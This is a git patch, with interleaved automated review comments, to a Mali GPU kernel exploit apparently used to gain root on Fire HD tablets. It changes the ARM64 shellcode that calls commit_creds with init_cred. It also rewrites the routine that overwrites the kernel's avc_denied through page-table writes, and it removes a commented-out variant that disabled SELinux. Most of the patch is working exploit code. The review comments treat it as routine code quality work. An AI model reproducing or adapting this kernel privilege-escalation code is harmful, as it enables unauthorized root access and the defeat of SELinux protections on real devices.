From 85dbd36e18dd8b87a6d3038266b4e2e6ef445121 Mon Sep 17 00:00:00 2001
From: yuu <46545607+mouseos@users.noreply.github.com>
Date: Wed, 8 May 2024 13:15:22 +0900
Subject: [PATCH] =?UTF-8?q?Baiker000=E6=B0=8F=E3=81=AE=E5=A4=89=E6=9B=B4?= =?UTF-8?q?=E3=82=92=E5=8F=8D=E6=98=A0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
https://xdaforums.com/t/potential-arm-mali-gpu-based-root-firehd-8th-12th-gen-affected.4574635/post-89496554
Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com>
---
 mali_shrinker_mmap32.c | 37 ++++++++++---------------------------
 1 file changed, 10 insertions(+), 27 deletions(-)
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
index 3cd6753..63e0ea9 100644
--- a/mali_shrinker_mmap32.c
+++ b/mali_shrinker_mmap32.c
@@ -91,6 +91,7 @@ Overwriting SELinux to permissive
 static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
 static uint32_t root_code[8] = {0};
+static uint32_t root_code2[8]={0};
 static uint32_t root_code_un[8] = {0};
 static uint8_t jit_id = 1;
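Review bot: The added `root_code2` declaration is spaced differently from the two sibling buffers it sits between (`root_code[8] = {0}`, `root_code_un[8] = {0}`) and gives no hint of how it differs from `root_code`; the numeric suffix is the only distinction. I would match the neighbours' formatting and name its writer, e.g. `static uint32_t root_code2[8] = {0}; // populated by fixup_root_shell2`. All three buffers share the fixed length of 8 words, so one named constant for that size would also tie the bare `[4]`..`[7]` stores in fixup_root_shell2 to the declaration instead of repeating the number.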
@@ -469,15 +470,15 @@ void fixup_root_shell2(uint64_t init_cred, uint64_t commit_cred, uint64_t avc_de
 printf("Run fixup_root_shell2\n");
 uint32_t init_adpr = write_adrp(0, avc_deny, init_cred);
 // Sets x0 to init_cred
- root_code[ADRP_INIT_INDEX] = init_adpr;
- root_code[ADD_INIT_INDEX] = add_init;
+ root_code2[ADRP_INIT_INDEX] = init_adpr;
+ root_code2[ADD_INIT_INDEX] = add_init;
 // Sets x8 to commit_creds
- root_code[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
- root_code[ADD_COMMIT_INDEX] = add_commit;
- root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
- root_code[5] = 0xd63f0100; // blr x8
- root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
- root_code[7] = 0xd65f03c0; // ret
+ root_code2[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
+ root_code2[ADD_COMMIT_INDEX] = add_commit;
+ root_code2[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code2[5] = 0xd63f0100; // blr x8
+ root_code2[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code2[7] = 0xd65f03c0; // ret
 printf("End fixup_root_shell2\n");
 }
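Review bot: The slots 4–7 are still bare magic indices while the first four stores go through the named `ADRP_INIT_INDEX`/`ADD_INIT_INDEX`/`ADRP_COMMIT_INDEX`/`ADD_COMMIT_INDEX` constants, and nothing in the function ties those indices to the declared length of `root_code2[8]`, so an edit that grows the sequence by one word would silently become an out-of-bounds write. Naming the remaining slots in the same enum, or — if the build is C11 — adding `_Static_assert(sizeof root_code2 / sizeof root_code2[0] == 8, "root_code2 holds 8 words");` next to the stores, would make the layout self-checking. The `printf` pair bracketing the body reads as leftover tracing; a debug macro or a single log line is the conventional form. The body of `fixup_root_shell2` is shown in full here but its signature line is above the hunk.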
@@ -690,33 +691,15 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
 //Go through the reserve pages addresses to write to avc_denied with our own shellcode
 write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
-/*for onyx
 void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
- uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
- write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-
- usleep(100000);
-
- //Call commit_creds to overwrite process credentials to gain root
- write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
-// write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-// write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-}
-*/
-//original code(avc_deny)
-void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
- /* Skip this
 uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
 write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 usleep(100000);
 //Go through the reserve pages addresses to write to avc_denied with our own shellcode
- write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+ write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code2[0]), sizeof(root_code2)/sizeof(uint32_t));
- //Triggers avc_denied to disable SELinux
- open("/dev/kmsg", O_RDONLY);
- */
 uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
 write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);